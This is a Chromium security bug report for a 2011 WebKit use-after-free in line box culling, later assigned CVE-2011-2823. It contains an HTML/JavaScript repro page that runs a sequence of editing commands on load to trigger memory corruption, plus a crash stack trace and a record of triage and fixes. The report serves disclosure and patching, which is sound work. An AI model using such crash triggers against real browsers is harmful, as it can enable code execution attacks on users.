Status: Fixed
Owner: ----
Closed: Jul 2011
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

REGRESSION (83075): Use after free in line box culling optimization
Reported by skylined@chromium.org, May 13 2011
Just found this and I'm dumping it before the weekend starts in MTV (in case somebody has time to have a look). I'm rebuilding Chrome and it's after work hours, so I won't look at this myself until Monday.

Repro:

<head>
  <script>
    function f() {
      document.designMode="on";
      document.execCommand("SelectAll");
      document.execCommand("InsertImage",false);
      document.execCommand("InsertImage",false);
      document.execCommand("Indent");
      document.execCommand("insertunorderedlist",false);
      document.execCommand("InsertUnorderedList",false);
      document.execCommand("Bold");
      document.execCommand("InsertLineBreak");
      document.execCommand("insertunorderedlist");
      document.execCommand("insertimage",false);
      document.execCommand("insertparagraph",false);
      document.execCommand("insertunorderedlist");
      document.execCommand("InsertUnorderedList");
      document.execCommand("Outdent");
    }
  </script>
</head>
<body onload='f();'><pre id="x">x</pre></body>

id:             chrome.dll!WebCore::requiresLineBox ExecAV@Arbitrary (a1b2d0b7782629a1c77ca95cb118a6fb)
description:    Security: Attempt to execute non-executable arbitrary memory (@0x013906EC) in chrome.dll!WebCore::requiresLineBox
note:           Based on this information, this is expected to be a security issue!
stack:          chrome.dll!WebCore::requiresLineBox
                chrome.dll!WebCore::RenderBlock::skipLeadingWhitespace
                chrome.dll!WebCore::RenderBlock::findNextLineBreak
                chrome.dll!WebCore::RenderBlock::layoutRunsAndFloats
                chrome.dll!WebCore::RenderBlock::layoutInlineChildren
                chrome.dll!WebCore::RenderBlock::layoutBlock
                chrome.dll!WebCore::RenderBlock::layout
                chrome.dll!WebCore::RenderBlock::layoutBlockChild
                chrome.dll!WebCore::RenderBlock::layoutBlockChildren
                chrome.dll!WebCore::RenderBlock::layoutBlock
                chrome.dll!WebCore::RenderBlock::layout
                chrome.dll!WebCore::RenderBlock::layoutBlockChild
                chrome.dll!WebCore::RenderBlock::layoutBlockChildren
                chrome.dll!WebCore::RenderBlock::layoutBlock
                chrome.dll!WebCore::RenderBlock::layout
                chrome.dll!WebCore::RenderBlock::layoutBlockChild
                chrome.dll!WebCore::RenderBlock::layoutBlockChildren
                chrome.dll!WebCore::RenderBlock::layoutBlock
                chrome.dll!WebCore::RenderBlock::layout
                chrome.dll!WebCore::RenderBlock::layoutBlockChild
                chrome.dll!WebCore::RenderBlock::layoutBlockChildren
                chrome.dll!WebCore::RenderBlock::layoutBlock
                chrome.dll!WebCore::RenderBlock::layout
                chrome.dll!WebCore::RenderBlock::layoutBlockChild
                chrome.dll!WebCore::RenderBlock::layoutBlockChildren
                chrome.dll!WebCore::RenderBlock::layoutBlock
                chrome.dll!WebCore::RenderBlock::layout
                chrome.dll!WebCore::RenderBlock::layoutBlockChild
                chrome.dll!WebCore::RenderBlock::layoutBlockChildren
                chrome.dll!WebCore::RenderBlock::layoutBlock
                chrome.dll!WebCore::RenderBlock::layout
                chrome.dll!WebCore::RenderBlock::layoutBlockChild
                chrome.dll!WebCore::RenderBlock::layoutBlockChildren
                chrome.dll!WebCore::RenderBlock::layoutBlock
                chrome.dll!WebCore::RenderBlock::layout
                chrome.dll!WebCore::RenderView::layout
                chrome.dll!WebCore::FrameView::layout
                chrome.dll!WebCore::Document::updateLayout
                chrome.dll!WebCore::Document::updateLayoutIgnorePendingStylesheets
                chrome.dll!WebCore::VisiblePosition::canonicalPosition
                chrome.dll!WebCore::VisiblePosition::init
                chrome.dll!WebCore::VisiblePosition::VisiblePosition
                chrome.dll!WebCore::VisibleSelection::setBaseAndExtentToDeepEquivalents
                chrome.dll!WebCore::VisibleSelection::validate
                chrome.dll!WebCore::VisibleSelection::VisibleSelection
                chrome.dll!WebCore::DeleteSelectionCommand::doApply
                chrome.dll!WebCore::EditCommand::apply
                chrome.dll!WebCore::CompositeEditCommand::applyCommandToComposite
                chrome.dll!WebCore::CompositeEditCommand::deleteSelection
                chrome.dll!WebCore::CompositeEditCommand::moveParagraphs
                chrome.dll!WebCore::IndentOutdentCommand::outdentParagraph
                chrome.dll!WebCore::IndentOutdentCommand::outdentRegion
                chrome.dll!WebCore::ApplyBlockElementCommand::doApply
                chrome.dll!WebCore::EditCommand::apply
                chrome.dll!WebCore::applyCommand
                chrome.dll!WebCore::executeOutdent
                chrome.dll!WebCore::Editor::Command::execute
                chrome.dll!WebCore::Document::execCommand
                chrome.dll!WebCore::DocumentInternal::execCommandCallback
                chrome.dll!v8::internal::HandleApiCallHelper<...>
                chrome.dll!v8::internal::Builtin_HandleApiCall
                chrome.dll!v8::internal::Invoke
                chrome.dll!v8::internal::Execution::Call
                chrome.dll!v8::Script::Run
 
Upstream: https://bugs.webkit.org/show_bug.cgi?id=60778
Possibly duplicate of: issue 78841
Comment 2 by kareng@google.com, May 13 2011
Status: Available
Cc: -security...@gtempaccount.com rniwa@chromium.org
Labels: -Mstone-X Mstone-12
Owner: security...@gtempaccount.com
Summary: Memory corruption in editing (was: NULL)
This regressed in http://trac.webkit.org/changeset/85267, but dev says it might not be related or potentially uncovered a sleeping problem.
Summary: REGRESSION (83075): Use after free in line box culling optimization (was: NULL)
Cc: jchaffraix@chromium.org
Labels: -Mstone-12 Mstone-13
Moving all M12 bugs to M13. We won't have another M12 patch.
Owner: security@chromium.org
Owner: jchaffraix@chromium.org
Status: Assigned
This is the last "old" WebKit bug we have on file. Julien, can you be begged to fix it since we're a bit overloaded? Or maybe if we're lucky, one of your generic layout root changes might have helped?
Owner: ----
Status: ExternalDependency
God Hyatt is fixing it.
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Status: WillMerge
http://trac.webkit.org/changeset/91781
Issue 90672 has been merged into this issue.
Labels: Merge-Pending
Status: FixUnreleased
Bulk move for WillMerge change.
Labels: -Merge-Pending Merge-Approved
Bulk move for WillMerge change.
Merged to M14 for baking: http://trac.webkit.org/changeset/92028
Labels: -Merge-Approved Merge-Merged
Merged to M13: http://trac.webkit.org/changeset/92501
Labels: CVE-2011-2823
Labels: SecImpacts-Stable
Batch update.
Comment 18 by cdn@chromium.org, May 15 2012
Status: Fixed
Marking old security bugs Fixed.
Project Member Comment 19 by bugdroid1@chromium.org, Oct 13 2012
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Project Member Comment 20 by bugdroid1@chromium.org, Mar 10 2013
Labels: -Type-Security -Area-WebKit -WebKit-Core -SecSeverity-High -Mstone-13 -SecImpacts-Stable Cr-Content Security-Impact-Stable M-13 Type-Bug-Security Cr-Content-Core Security-Severity-High
Project Member Comment 21 by bugdroid1@chromium.org, Mar 13 2013
Labels: Restrict-View-EditIssue
Project Member Comment 22 by bugdroid1@chromium.org, Mar 13 2013
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue
Project Member Comment 24 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Severity-High Security_Severity-High
Project Member Comment 25 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member Comment 26 by bugdroid1@chromium.org, Apr 6 2013
Labels: -Cr-Content Cr-Blink
Project Member Comment 27 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 28 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic